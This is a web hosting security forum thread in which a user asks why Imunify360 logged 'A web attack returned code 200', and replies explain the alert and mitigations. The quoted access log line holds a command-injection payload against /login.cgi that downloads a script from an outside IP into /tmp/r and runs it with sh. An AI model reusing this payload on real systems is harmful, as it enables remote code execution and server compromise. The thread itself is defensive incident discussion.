A web attack returned code 200 (success).
Forum
  1. Forums
  2. Imunify360
  3. Imunify360 and Imunify Sensor
  1. Glenn Taylor
  2. Tuesday, 03 July 2018
  3.  Subscribe via email
Hi there,

I've seen a couple of these in IM logs:


A web attack returned code 200 (success).
6
block
79.10.148.140 - - [29/Jun/2018:19:45:52 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200 20822 "-" "Hello, World" WL:"0" "-" XFF:"-"


What does it mean when it says: A web attack returned code 200 (success)?

thx
G
Rate this post:
  1. 13.07.2018 10:07:36
  2. # 1
Posts: 60
Joined: 17.08.2016
0
Votes
Undo
Hello! This rule doesn't work correctly - it works on requests to Captcha. Therefore, we will rewrite or remove it soon.
Thank you!
  1. 20.07.2018 15:07:14
  2. # 2
Tonat Accepted Answer
Posts: 0
Joined: 23.07.2019
0
Votes
Undo
IMHO, it means that the server has probably been hacked. Look for the file "/tmp/r" and any possible related processes.

More info: https://www.exploit-db.com/exploits/44760/
  1. 24.07.2018 21:07:14
  2. # 3
Exorcist Accepted Answer
Posts: 0
Joined: 23.07.2019
0
Votes
Undo
Hello!
This particular request doesn't trigger a blocking rule though it is being spotted by 3 generic rules from i360_1_generic.conf
Please take into consideration that in order to be blocked a request pattern should present in strict rule sets (blocking rules) but it doesn't based on the 200 response.

You can try to activate Proactive Defense (and turn Kill mode on), which logic is based on an advanced heuristic mechanism but not on patterns match. With this mode enabled the aforementioned request will be 100% blocked (checked!). :)
  • Page :
  • 1


There are no replies made for this post yet.
Be one of the first to reply to this post!
Guest
Submit Your Response
Upload files or images for this discussion by clicking on the upload button below. Supports gif,jpg,png,zip,rar,pdf
• Insert • Remove Upload Files (Maximum File Size: 2 MB)
Captcha
To protect the site from bots and unauthorized scripts, we require that you enter the captcha codes below before posting your question.